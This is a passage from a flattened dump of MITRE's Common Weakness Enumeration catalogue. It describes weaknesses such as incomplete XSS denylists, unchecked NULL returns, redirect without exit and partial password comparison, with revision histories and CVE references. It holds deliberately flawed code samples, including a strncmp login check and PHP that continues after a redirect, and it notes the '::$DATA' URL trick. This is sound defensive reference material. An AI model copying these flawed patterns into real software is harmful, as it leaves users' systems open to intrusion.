Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Description - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Detection_Factors - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - The software calls a function, procedure, or routine, but the caller specifies the wrong variable or reference as one of the arguments, which may lead to undefined behavior and resultant weaknesses. - - - - - - Primary - - - - - - - - - Implementation - This problem typically occurs when the programmer makes a typo, or copy and paste errors. - - - - - Other - Quality Degradation - - - - - Other - While this weakness might be caught by the compiler in some languages, it can occur more frequently in cases in which the called function accepts variable numbers of arguments, such as format strings in C. It also can occur in loosely typed languages or environments. This might require an understanding of intended program behavior or design to determine whether the value is incorrect. - - - - - Testing - Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type. - - - - - In the following Java snippet, the accessGranted() method is accidentally called with the static ADMIN_ROLES array rather than the user roles. - - private static final String[] ADMIN_ROLES = ...;public boolean void accessGranted(String resource, String user) {String[] userRoles = getUserRoles(user);return accessGranted(resource, ADMIN_ROLES);} - private boolean void accessGranted(String resource, String[] userRoles) { - - - // grant or deny access based on user roles - ... - } - - - - - - CVE-2005-2548 - Kernel code specifies the wrong variable in first argument, leading to resultant NULL pointer dereference. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2548 - - - - - CWE Content Team - MITRE - 2008-04-11 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Detection_Factors, Relationships, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-05-27 - updated Description - - - CWE Content Team - MITRE - 2009-10-29 - updated Modes_of_Introduction, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Detection_Factors - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product, while copying or cloning a resource, does not set the resource's permissions or access control until the copy is complete, leaving the resource exposed to other spheres while the copy is taking place. - - - - - - - - Primary - - - - - - - - - Implementation - - Common examples occur in file archive extraction, in which the product begins the extraction with insecure default permissions, then only sets the final permissions (as specified in the archive) once the copy is complete. The larger the archive, the larger the timing window for the race condition. - This weakness has also occurred in some operating system utilities that perform copies of deeply nested directories containing a large number of files. - This weakness can occur in any type of functionality that involves copying objects or resources in a multi-user environment, including at the application level. For example, a document management system might allow a user to copy a private document, but if it does not set the new copy to be private as soon as the copy begins, then other users might be able to view the document while the copy is still taking place. - - - - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - - - - - CVE-2002-0760 - Archive extractor decompresses files with world-readable permissions, then later sets permissions to what the archive specified. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0760 - - - CVE-2005-2174 - Product inserts a new object into database before setting the object's permissions, introducing a race condition. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2174 - - - CVE-2006-5214 - Error file has weak permissions before a chmod is performed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5214 - - - CVE-2005-2475 - Archive permissions issue using hard link. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2475 - - - CVE-2003-0265 - Database product creates files world-writable before initializing the setuid bits, leading to modification of executables. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0265 - - - - - - - - - - - Under-studied. It seems likely that this weakness could occur in any situation in which a complex or large copy operation occurs, when the resource can be made available to other spheres as soon as it is created, but before its initialization is complete. - - - - CWE Content Team - MITRE - 2008-04-11 - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References - - - CWE Content Team - MITRE - 2014-06-23 - updated Modes_of_Introduction, Other_Notes - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software does not properly prevent access to, or detect usage of, alternate data streams (ADS). - An attacker can use an ADS to hide information about a file (e.g. size, the name of the process) from a system or file browser tools such as Windows Explorer and 'dir' at the command line utility. Alternately, the attacker might be able to bypass intended access restrictions for the associated data fork. - - - - - - - - - Alternate data streams (ADS) were first implemented in the Windows NT operating system to provide compatibility between NTFS and the Macintosh Hierarchical File System (HFS). In HFS, data and resource forks are used to store information about a file. The data fork provides information about the contents of the file while the resource fork stores metadata such as file type. - - - - Architecture and Design - - - Implementation - - - - - Access Control - Non-Repudiation - Other - Bypass Protection Mechanism - Hide Activities - Other - - - - - Testing - Software tools are capable of finding ADSs on your system. - - - Implementation - Ensure that the source code correctly parses the filename to read or write to the correct stream. - - - - - CVE-1999-0278 - In IIS, remote attackers can obtain source code for ASP files by appending "::$DATA" to the URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0278 - - - CVE-2000-0927 - Product does not properly record file sizes if they are stored in alternative data streams, which allows users to bypass quota restrictions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0927 - - - - System Process - - - - Windows ::DATA alternate data stream - - - - - - - - - - - This and similar problems exist because the same resource can have multiple identifiers that dictate which behavior can be performed on the resource. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Background_Details, Description, Relationships, Other_Notes, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Theoretical_Notes - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-12-13 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Windows ::DATA Alternate Data Stream - Failure to Handle Windows ::DATA Alternate Data Stream - - - - The product does not check for an error after calling a function that can return with a NULL pointer if the function fails, which leads to a resultant NULL pointer dereference. - While unchecked return value weaknesses are not limited to returns of NULL pointers (see the examples in CWE-252), functions often return NULL to indicate an error status. When this error condition is not checked, a NULL pointer dereference can occur. - - - - - - - - - - - Implementation - A typical occurrence of this weakness occurs when an application includes user-controlled input to a malloc() call. The related code might be correct with respect to preventing buffer overflows, but if a large value is provided, the malloc() will fail due to insufficient memory. This problem also frequently occurs when a parsing routine expects that certain elements will always be present. If malformed input is provided, the parser might return NULL. For example, strtok() can return NULL. - - - - - Availability - DoS: Crash, Exit, or Restart - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - Read Memory - Modify Memory - In rare circumstances, when NULL is equivalent to the 0x0 memory address and privileged code can access it, then writing or reading memory is possible, which may lead to code execution. - - - - - Black Box - This typically occurs in rarely-triggered error conditions, reducing the chances of detection during black box testing. - - - White Box - Code analysis can require knowledge of API behaviors for library functions that might return NULL, reducing the chances of detection when unknown libraries are used. - - - - - The code below makes a call to the getUserName() function but doesn't check the return value before dereferencing (which may cause a NullPointerException). - - String username = getUserName();if (username.equals(ADMIN_USER)) {...} - - - - This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. - - void host_lookup(char *user_supplied_addr){ - struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); - - /*routine that ensures user_supplied_addr is in the right format for conversion */ - - validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); - } - - If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference (CWE-476) would then occur in the call to strcpy(). - Note that this code is also vulnerable to a buffer overflow (CWE-119). - - - - - CVE-2008-1052 - Large Content-Length value leads to NULL pointer dereference when malloc fails. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1052 - - - CVE-2006-6227 - Large message length field leads to NULL pointer dereference when malloc fails. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6227 - - - CVE-2006-2555 - Parsing routine encounters NULL dereference when input is missing a colon separator. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2555 - - - CVE-2003-1054 - URI parsing API sets argument to NULL when a parsing failure occurs, such as when the Referer header is missing a hostname, leading to NULL dereference. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1054 - - - CVE-2008-5183 - chain: unchecked return value can lead to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5183 - - - - - EXP34-C - Do not dereference null pointers - CWE More Specific - - - ERR08-J - Do not catch NullPointerException or any of its ancestors - - - EXP32-PL - Do not ignore function return values - CWE More Specific - - - - - CWE Content Team - MITRE - 2008-04-11 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Description, Detection_Factors, Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-09-27 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-06-23 - updated Modes_of_Introduction, Other_Notes - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Relevant_Properties, Taxonomy_Mappings, Time_of_Introduction - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-06-25 - updated Common_Consequences - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Relationships - - - - - The code does not sufficiently manage its control flow during execution, creating conditions in which the control flow can be modified in unexpected ways. - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Alter Execution Logic - - - - - 40 - Insufficient Process Validation - - - - - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Maintenance_Notes, Other_Notes, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships, Relevant_Properties - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Type - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - - - The product uses a denylist-based protection mechanism to defend against XSS attacks, but the denylist is incomplete, allowing XSS variants to succeed. - While XSS might seem simple to prevent, web browsers vary so widely in how they parse web pages, that a denylist cannot keep track of all the variations. The "XSS Cheat Sheet" [REF-714] contains a large number of attacks that are intended to bypass incomplete denylists. - - - - - - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - - - - - CVE-2007-5727 - Denylist only removes <SCRIPT> tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5727 - - - CVE-2006-3617 - Denylist only removes <SCRIPT> tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3617 - - - CVE-2006-4308 - Denylist only checks "javascript:" tag - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4308 - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes - - - CWE Content Team - MITRE - 2008-09-24 - added Language_Class "All" - - - CWE Content Team - MITRE - 2008-10-14 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-06-23 - updated Applicable_Platforms, Description, Other_Notes - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Relevant_Properties - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-06-25 - updated Description, Name, Observed_Examples, References - - Incomplete Blacklist to Cross-Site Scripting - - - - The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product. - This weakness covers three distinct situations. A "missing" protection mechanism occurs when the application does not define any mechanism against a certain class of attack. An "insufficient" protection mechanism might provide some defenses - for example, against the most common attacks - but it does not protect against everything that is intended. Finally, an "ignored" mechanism occurs when a mechanism is available and in active use within the product, but the developer has not applied it in some code path. - - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Access Control - Bypass Protection Mechanism - - - - - - - - - - - - - - - - - - - - - - - The concept of protection mechanisms is well established, but protection mechanism failures have not been studied comprehensively. It is suspected that protection mechanisms can have significantly different types of weaknesses than the weaknesses that they are intended to prevent. - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-01-12 - updated Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Maintenance_Notes, Other_Notes, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Related_Attack_Patterns, Relationships, Type - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The software uses multiple resources that can have the same identifier, in a context in which unique identifiers are required. - If the software assumes that each resource has a unique identifier, the software could operate on the wrong resource if attackers can cause multiple resources to be associated with the same identifier. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - If unique identifiers are assumed when protecting sensitive resources, then duplicate identifiers might allow attackers to bypass the protection. - - - Other - Quality Degradation - - - - - Architecture and Design - Where possible, use unique identifiers. If non-unique identifiers are detected, then do not operate any resource with a non-unique identifier and report the error appropriately. - - - - - CVE-2013-4787 - chain: mobile OS verifies cryptographic signature of file in an archive, but then installs a different file with the same name that is also listed in the archive. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4787 - - - - This weakness is probably closely associated with other issues related to doubling, such as CWE-675 (Duplicate Operations on Resource). It's often a case of an API contract violation (CWE-227). - - - - CWE Content Team - MITRE - 2008-09-09 - Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Applicable_Platforms, Common_Consequences, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relevant_Properties - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software uses low-level functionality that is explicitly prohibited by the framework or specification under which the software is supposed to operate. - The use of low-level functionality can violate the specification in unexpected ways that effectively disable built-in protection mechanisms, introduce exploitable inconsistencies, or otherwise expose the functionality to attack. - - - - - - Architecture and Design - - - Implementation - - - - - Other - Other - - - - - - - - CWE Content Team - MITRE - 2008-09-09 - Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product performs multiple related behaviors, but the behaviors are performed in the wrong order in ways which may produce resultant weaknesses. - - - - - - Primary - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Alter Execution Logic - - - - - CVE-2019-9805 - Chain: Creation of the packet client occurs before initialization is complete (CWE-696) resulting in a read from uninitialized memory (CWE-908), causing memory corruption. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9805 - - - CVE-2007-5191 - file-system management programs call the setuid and setgid functions in the wrong order and do not check the return values, allowing attackers to gain unintended privileges - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5191 - - - CVE-2007-1588 - C++ web server program calls Process::setuid before calling Process::setgid, preventing it from dropping privileges, potentially allowing CGI programs to be called with higher privileges than intended - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1588 - - - - - POS36-C - Observe correct revocation order while relinquishing privileges - CWE More Abstract - - - - - - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Observed_Examples - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Description, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Observed_Examples - - - - - The software compares two entities in a security-relevant context, but the comparison is incorrect, which may lead to resultant weaknesses. - - This weakness class covers several possibilities: - - - the comparison checks one factor incorrectly; - the comparison should consider multiple factors, but it does not check some of those factors at all; - the comparison checks the wrong factor. - - - - - - Primary - - - - - - - - - Implementation - - - - - Other - Varies by Context - - - - - Consider an application in which Truck objects are defined to be the same if they have the same make, the same model, and were manufactured in the same year. - - public class Truck { - private String make;private String model;private int year; - public boolean equals(Object o) { - if (o == null) return false;if (o == this) return true;if (!(o instanceof Truck)) return false; - Truck t = (Truck) o; - return (this.make.equals(t.getMake()) && this.model.equals(t.getModel())); - } - } - - Here, the equals() method only checks the make and model of the Truck objects, but the year of manufacture is not included. - - - This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded. - - - /* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */ - - char *username = "admin";char *pass = "password"; - int AuthenticateUser(char *inUser, char *inPass) {if (strncmp(username, inUser, strlen(inUser))) {logEvent("Auth failure of username using strlen of inUser");return(AUTH_FAIL);}if (! strncmp(pass, inPass, strlen(inPass))) {logEvent("Auth success of password using strlen of inUser");return(AUTH_SUCCESS);}else {logEvent("Auth fail of password using sizeof");return(AUTH_FAIL);}} - int main (int argc, char **argv) { - int authResult;if (argc < 3) {ExitError("Usage: Provide a username and password");}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult == AUTH_SUCCESS) {DoAuthenticatedTask(argv[1]);}else {ExitError("Authentication failed");}} - - In AuthenticateUser(), the strncmp() call uses the string length of an attacker-provided inPass parameter in order to determine how many characters to check in the password. So, if the attacker only provides a password of length 1, the check will only examine the first byte of the application's password before determining success. - As a result, this partial comparison leads to improper authentication (CWE-287). - Any of these passwords would still cause authentication to succeed for the "admin" user: - - ppapaspass - - This significantly reduces the search space for an attacker, making brute force attacks more feasible. - The same problem also applies to the username, so values such as "a" and "adm" will succeed for the username. - While this demonstrative example may not seem realistic, see the Observed Examples for CVE entries that effectively reflect this same weakness. - - - - - CVE-2016-10003 - Proxy performs incorrect comparison of request headers, leading to infoleak - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10003 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - This entry likely has some relationships with case sensitivity (CWE-178), but case sensitivity is a factor in other types of weaknesses besides comparison. Also, in cryptography, certain attacks are possible when certain comparison operations do not take place in constant time, causing a timing-related information leak (CWE-208). - - - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-05-27 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships, Type - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - Insufficient Comparison - - - - The web application sends a redirect to another location, but instead of exiting, it executes additional code. - - - - - - - Primary - - - - - Redirect Without Exit - - - - - Implementation - - - - - Other - Confidentiality - Integrity - Availability - Alter Execution Logic - Execute Unauthorized Code or Commands - This weakness could affect the control flow of the application and allow execution of untrusted code. - - - - - Black Box - This issue might not be detected if testing is performed using a web browser, because the browser might obey the redirect and move the user to a different page before the application has produced outputs that indicate something is amiss. - - - - - This code queries a server and displays its status when a request comes from an authorized IP address. - - $requestingIP = $_SERVER['REMOTE_ADDR'];if(!in_array($requestingIP,$ipAllowList)){echo "You are not authorized to view this page";http_redirect($errorPageURL);}$status = getServerStatus();echo $status; - ... - - - - This code redirects unauthorized users, but continues to execute code after calling http_redirect(). This means even unauthorized users may be able to access the contents of the page or perform a DoS attack on the server being queried. Also, note that this code is vulnerable to an IP address spoofing attack (CWE-212). - - - - - CVE-2013-1402 - Execution-after-redirect allows access to application configuration details. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1402 - - - CVE-2009-1936 - chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1936 - - - CVE-2007-2713 - Remote attackers can obtain access to administrator functionality through EAR. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2713 - - - CVE-2007-4932 - Remote attackers can obtain access to administrator functionality through EAR. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4932 - - - CVE-2007-5578 - Bypass of authentication step through EAR. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5578 - - - CVE-2007-2713 - Chain: Execution after redirect triggers eval injection. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2713 - - - CVE-2007-6652 - chain: execution after redirect allows non-administrator to perform static code injection. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6652 - - - - - - - - CWE Content Team - MITRE - 2008-09-09 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2013-02-21 - updated Alternate_Terms, Name, Observed_Examples, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples - - Redirect Without Exit - - - - The default error page of a web application should not display sensitive information about the software system. - - A Web application must define a default error page for 4xx errors (e.g. 404), 5xx (e.g. 500) errors and catch java.lang.Throwable exceptions to prevent attackers from mining information from the application container's built-in error response. - When an attacker explores a web site looking for vulnerabilities, the amount of information that the site provides is crucial to the eventual success or failure of any attempted attacks. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Read Application Data - A stack trace might show the attacker a malformed SQL query string, the type of database being used, and the version of the application container. This information enables the attacker to target known 